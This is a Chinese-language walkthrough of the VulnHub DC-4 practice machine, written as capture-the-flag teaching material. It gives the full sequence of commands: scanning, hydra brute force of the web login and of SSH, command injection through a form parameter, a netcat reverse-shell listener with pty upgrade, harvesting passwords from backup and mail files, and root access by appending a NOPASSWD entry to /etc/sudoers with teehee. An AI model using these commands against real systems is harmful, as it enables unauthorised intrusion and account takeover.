vulnhub DC-4靶机实战

0X01 环境部署

1.下载地址

https://www.vulnhub.com/entry/dc-4,313/

vulnhub DC-4靶机实战_第1张图片

安装好并将网络置为NET模式
kali net模式
DC-4 net模式

vulnhub DC-4靶机实战_第2张图片

0X02 信息收集

1.主机发现

arpscan -l

vulnhub DC-4靶机实战_第3张图片

1. kali   192.168.190.128
2. 目标机  192.168.190.132

2.目录扫描

python3 dirsearch.py -u http://192.168.190.132/

vulnhub DC-4靶机实战_第4张图片

3.查看网站配置

vulnhub DC-4靶机实战_第5张图片

4.端口收集

nmap -sS 192.168.190.132

vulnhub DC-4靶机实战_第6张图片

发现存在80端口,可以进行查看

vulnhub DC-4靶机实战_第7张图片

admin多半是账户名,进行爆破,本次利用kali自带的爆破软件hydra,爆破字典也是kali自带
位置在/usr/share/wordlists/rockyou.txt.gz

vulnhub DC-4靶机实战_第8张图片

hydra -l admin -P rockyou.txt 192.168.190.132 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

vulnhub DC-4靶机实战_第9张图片

账号:admin 
密码:happy

vulnhub DC-4靶机实战_第10张图片

抓取网络数据包,发现是命令执行
接收命令的参数就是radio

vulnhub DC-4靶机实战_第11张图片

尝试修改radio后面参数,例whoami,查看当前权限

vulnhub DC-4靶机实战_第12张图片

0X03 Getshell

进行反弹shell
kali开启监听          nc -lvnp 5678
利用可以进行执行命令,  进行反弹shell

vulnhub DC-4靶机实战_第13张图片

进行交互式的:python -c 'import pty;pty.spawn("/bin/bash")'

vulnhub DC-4靶机实战_第14张图片

切换到home 加目录下进行查看
cd /home 
ls la
发现有三个用户,切换到jim目录下进行查看
cd jim
ls -la

vulnhub DC-4靶机实战_第15张图片

到jim用户下的目录进行查看是否有可以利用的信息
cat test.sh

vulnhub DC-4靶机实战_第16张图片

查看其他目录
cd /backups 
ls 
cat old-passwords.bak
将查到的密码进行保存
vim mm.txt

vulnhub DC-4靶机实战_第17张图片

vulnhub DC-4靶机实战_第18张图片

由于刚刚查看端口信息时,发现了22端口,可以利用hydra再次进行爆破

 hydra -l jim -P mm.txt -I -t 64 ssh://192.168.190.132:22

vulnhub DC-4靶机实战_第19张图片

jim/jibril04

尝试进行登录

ssh [email protected]

vulnhub DC-4靶机实战_第20张图片

0X04 提权

1.当前权限

whoami

尝试sudo 是否可以提权

sudo -l

vulnhub DC-4靶机实战_第21张图片

查看有什么其他的文件

ls
cat mbox   

vulnhub DC-4靶机实战_第22张图片

发现是一份邮件,进行一个查看

cd /var/mail
cat jim

vulnhub DC-4靶机实战_第23张图片

是一份charles写给jim的信,有charles的密码

charles/ ^xHhA&hvim0y

切换到charles用户下查看其文件是否可以进行提权

su charles
cd /home/charles
ls -la

vulnhub DC-4靶机实战_第24张图片

继续利用sudo提权尝试

sudo -l

vulnhub DC-4靶机实战_第25张图片

2.开始提权

tee-从标准输入读取并写入标准输出和文件

由于我们没有sudo权限,也就没有办法切换成root用户,但是teehee或许可以帮助进行提权成功,输入此代码:

echo 'charles ALL=(ALL:ALL) NOPASSWD:ALL' | sudo teehee -a /etc/sudoers
这句话的意思是将charles这个用户赋予执行sudo的权限添加到/etc/sudoers里。
| 是管道符 将前面的输出添加到后面
sudo teehee -a 是用管理员权限使用teehee -a命令
teehee -a 是添加一条语句到 /etc/sudoers里
/etc/sudoers 里存着的用户都有执行sudo的权限。

vulnhub DC-4靶机实战_第26张图片

sudo su
whoami
ls -la
cat flag.txt

vulnhub DC-4靶机实战_第27张图片

0X05 总结

1.首先收集信息,真实ip,端口,网站目录,网站部署部件等
2.根据开放端口进行测试
3.利用80端口配合命令执行,getshell
4.利用用户之间的关系进行测试
5.查看权限,利用sudo进行提权
6.提权成功查看flag

你可能感兴趣的:(#,Vulnhub,网络安全,web,测试工具)